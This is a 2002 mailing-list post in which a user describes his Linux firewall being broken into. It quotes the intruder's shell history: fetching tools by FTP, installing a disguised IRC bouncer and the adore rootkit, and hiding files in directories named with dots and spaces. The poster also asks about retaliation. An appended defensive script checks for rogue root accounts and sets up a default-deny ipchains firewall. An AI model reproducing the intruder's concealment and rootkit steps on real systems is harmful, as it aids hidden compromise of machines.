[CLUE-Tech] Lousy no-good @!$#%@#$% (cracked)

Sean LeBlanc seanleblanc at attbi.com
Mon Jan 28 20:08:25 MST 2002


Well, I've been noticing weird things on my firewall box since Friday.  I
wasn't able to SSH in several times, had to turn it on from the console,
only to discover hours later or next day it's not working again. So this
morning I'm eating my bagel and coffee before work and I decide to try SSH
again.  It's not on. So I start getting suspicious (finally) and decide to
snoop about for any foul play - sure enough, I've been cracked. I've been
pretty lazy about setting up ipchains to block things that I should be
blocking. I am guessing that this jackass is trying to make my box part of a
DDoS attack when the word comes via IRC. Here's at least a partial log of
what he did (from .bash_history) from an account called marian he made on
the box (with user id of 0):

whoami
mkdir ".. "
cd ".. "
mkdir ...
cd ...
mkdir ".. "
cd ".. "
ftp www.marianhome.go.ro
tar xzvf psyBNC2.2.tar.gz
cd psybnc
pico psybnc.conf
ake
make
pico psybnc.conf
mv psybnc pppd6
./pppd6
ftpwww.marianhome.go.ro
ftp www.marianhome.go.ro
ftp ftp.gecities.com
tar xzvf adore.tgz
cd adore
./configure
make
./configure
pico adore.h
ls -a
./startadore
ps ax
./configure
ls -a
./ava
ava i 6103
./ava i 6103
./ava i 6103
ps ax

This was from today's session - I don't *think* he's the average script
kiddie, since he did try to cover his tracks by deleting .bash_history
during some of his shenanigans the first time... plus he's not trying to
exploit Windows.

I also scribbled down the IP numbers from where some of the logins took
place. Is there anything I can do in retaliation? He kept turning off ssh
(kind of stupid; it would have taken me a lot longer to notice otherwise)
and turned ON telnet. He also enabled rlogin, too. I tried to close things
up (hastily) before work, but I overlooked the rlogin...before I went to
work, I deleted his home dir and entry in passwd. I tried to deny packets to
port 53, but I'm not sure how to test. I guess I didn't do too good of a
job, because by 10:30, he must have logged in and killed sshd
again...because it wasn't responding. I had to wait until I got home, and
sure enough, my little friend had been at it again. 

Prior to the attack, I was running some services which I know I shouldn't have
been, at least not without denying packets from outside - bind, smbd, nmbd,
identd. I still have no idea what he did to crack the machine, and that really
bothers me. What I'd like to do is get ipchains rules together that block
all incoming packets except for ssh and except for stuff returning from
machines behind the firewall. Getting cut off from my home machine while at work is
a real PITA w/o the added worry of what this induhvidual's intentions are...

So, any advice anyone has would be great. I ran Bastille scripts on this
machine once before, I may do that again, too...I changed a few things since
last I ran it, so it sure couldn't help.

I planned on swapping out this machine, and putting in its place OpenBSD
(and a very bare installation, at that); now I guess that is higher up on
the priority list - but in the meantime, I'd like some stopgap measure to
keep this punk out. I have to at least download the OpenBSD ISO and get some
hardware in order before I can do what I really need to do to stop this
nonsense.

-- 
Sean LeBlanc:seanleblanc at attbi.com Yahoo:seanleblancathome 
ICQ:138565743 MSN:seanleblancathome AIM:sleblancathome 
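Added example, not part of Sean's post or of any tool he names: a small POSIX shell script covering the two practical points above, the cleanup checks (the uid-0 "marian" account, the ".. " and "..." hiding directories, telnet/rlogin switched back on in inetd) and a default-deny ipchains ruleset that only lets SSH and the return half of inside-initiated TCP sessions through. The passwd and inetd.conf contents are constructed samples; the interface names (eth0 outside, eth1 inside) and the 192.168.1.0/24 LAN subnet are assumptions passed as arguments. The ruleset is printed rather than applied so it can be read before piping it to sh on the firewall.

```shell
#!/bin/sh
# Added example, not from the original post. All sample inputs below are
# constructed for offline testing; interface names and LAN subnet are
# assumptions supplied as arguments.

# --- 1. Extra UID-0 accounts ---------------------------------------------
# The intruder added a user "marian" with uid 0. Any account with UID 0 other
# than root is a backdoor. Reads passwd-format lines on stdin; on a live
# box:  find_extra_uid0 < /etc/passwd
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Constructed /etc/passwd sample (one legitimate root, one rogue uid-0 user).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
sean:x:500:500:Sean:/home/sean:/bin/bash
marian:x:0:0::/home/marian:/bin/bash'

# --- 2. Directories named only with dots and spaces -----------------------
# The history shows  mkdir ".. "  and  mkdir ...  used to hide the toolkit.
# Lists every directory under $1 whose basename is solely dots and/or spaces.
find_dot_space_dirs() {
    find "$1" -mindepth 1 -type d | awk -F/ '$NF ~ /^[. ]+$/'
}

# --- 3. Services re-enabled through inetd --------------------------------
# telnet and rlogin were switched back on. Prints the service name of every
# uncommented entry in inetd.conf-format input:
#   active_inetd_services < /etc/inetd.conf
active_inetd_services() {
    grep -v '^[[:space:]]*#' | awk 'NF { print $1 }'
}

# Constructed inetd.conf sample: ftp and rsh commented out, telnet and
# rlogin active.
SAMPLE_INETD='#ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
#shell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
login   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rlogind'

# --- 4. Default-deny ipchains ruleset -------------------------------------
# Prints (does not apply) a 2.2-kernel ipchains ruleset: deny everything that
# arrives on the outside interface except SSH and the non-SYN packets of TCP
# sessions opened from inside (ipchains has no connection tracking, so "! -y"
# is the closest thing to "established"); UDP replies from port 53 are let in
# so the box and masqueraded LAN hosts can still resolve names; inbound port
# 53 itself stays denied. Review the output, then on the firewall:
#   ipchains_rules eth0 eth1 192.168.1.0/24 | sh
ipchains_rules() {
    wan=$1 lan=$2 lannet=$3
    cat <<EOF
ipchains -F
ipchains -P input DENY
ipchains -P forward DENY
ipchains -P output ACCEPT
ipchains -A input -i lo -j ACCEPT
ipchains -A input -i $lan -s $lannet -j ACCEPT
ipchains -A input -i $wan -p tcp --destination-port 22 -j ACCEPT
ipchains -A input -i $wan -p tcp ! -y -j ACCEPT
ipchains -A input -i $wan -p udp --source-port 53 --destination-port 1024:65535 -j ACCEPT
ipchains -A input -i $wan -j DENY -l
ipchains -A forward -s $lannet -j MASQ
EOF
}

# Demonstration on the constructed samples: prints "marian", then
# "telnet" and "login".
printf '%s\n' "$SAMPLE_PASSWD" | find_extra_uid0
printf '%s\n' "$SAMPLE_INETD" | active_inetd_services
```

The final DENY rule carries -l, so every packet the outside interface drops (telnet, rlogin, anything on 53) shows up in the kernel log with its source address, which gives a record of further login attempts without exposing the service.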